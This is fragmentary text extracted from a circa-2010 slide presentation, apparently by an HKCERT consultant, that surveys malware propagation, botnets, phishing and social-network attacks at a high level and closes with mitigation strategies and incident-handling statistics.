Documente Academic
Documente Profesional
Documente Cultură
and Defense
SC Leung
Senior Consultant
Agenda
Page 2
Security Threat Landscape
Attacks targeting at Our Vulnerabilities
System and
Human
Applications
Page 4
New Phishing Tactic Targets Tabs
http://www.azarask.in/blog/post/a-new-type-of-phishing-
attack/ (Proof of concept included)
http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-
targets-tabs/
Page 5
Botnet (roBot Network) is the major threat
Bot Herder
Command &
Control Centre
C&C
Bots
Your computers!
bot bot bot
attacks
victim victim
Page 6
Maturity of the Underground Economy
sophistication
Page 7
Malware 2.0
Propagation
Forming a Botnet
Manage
Update
Survive the adverse
Encryption or obfuscation
Morphing
Page 9
Malware Propagation channels
Document
Executables Website
Malware
Page 10
Malware Propagation channels
Document
Executables Website
Malware
Fake security
software
Fake video player
codec
Page 11
Malware Propagation channels
Document
Executables Website
Malware
Embedded malware
in PDF or Office files
Zeus botnet served
PDF malware (Apr-
2010)
Image by Websense
Page 12
Malware Propagation channels
Document
Executables Website
Malware
Legitimate and
trusted websites
compromised
Used to redirect user
to malicious websites
(via injected invisible
iframes)
Most significant
Web admin incapable
to detect and mitigate
the risks
Page 13
Malware Propagation via websites
Page 14
PHPNuke.org web site hacked in May 2010
Page 15
Malware Propagation Channels
Document
Executables Website
Malware
Document
Executables Website
Malware
Targeted Attacks
Page 17
Attacks Following Money
Social Networking
P2P File Sharing
Services
Page 19
Social network
Data Leakage
Page 20
Client Side attacks via Social Network Sites
Page 21
Client Side attacks via Social Network Sites
Page 22
Submitting the malware to VirusTotal.com
Page 23
Only small portion of scanners can identify the malware
Redirection of attacks to central exploit server
Malicious servers redirect victims to the Exploit Server which
serves as a central delivery
Source: http://www.honeynet.org/papers/mws/KYE-Malicious_Web_Servers.htm
Page 24
Mobile Computing
Chained exploit
Page 26
Consequence of Attack
Consequences of Security Exposure
Page 28
Mitigation Strategies
Revisited
What do we do?
International
Cyber Drill Exercise
Collaboration
– Good example of Conficker Working
Group
Page 30
Awareness Education and Training
Public ISPs
Page 31
Proactivity in Incident Handling in HKCERT
Incident Reports Statistics (Apr-3 to Sep-30 2009)
Traditional report vs Proactive Discovery (search incidents that are
not reported)
– Traditional report: 493 (60%); Proactive Discovery: 330 (40%)
Conclusion:
– Proactive Discovery is becoming a key source of incident reports
– Overseas and referral reports has a significant portion.
– We are aware more resources are required for handling external
communication, development of automated searching capability
Page 32
What can you do – infrastructure?
Personal Company
Page 33
HKCERT Guidelines
http://www.hkcert.org/english/sguide_faq/home.html
Page 34
Point of Contact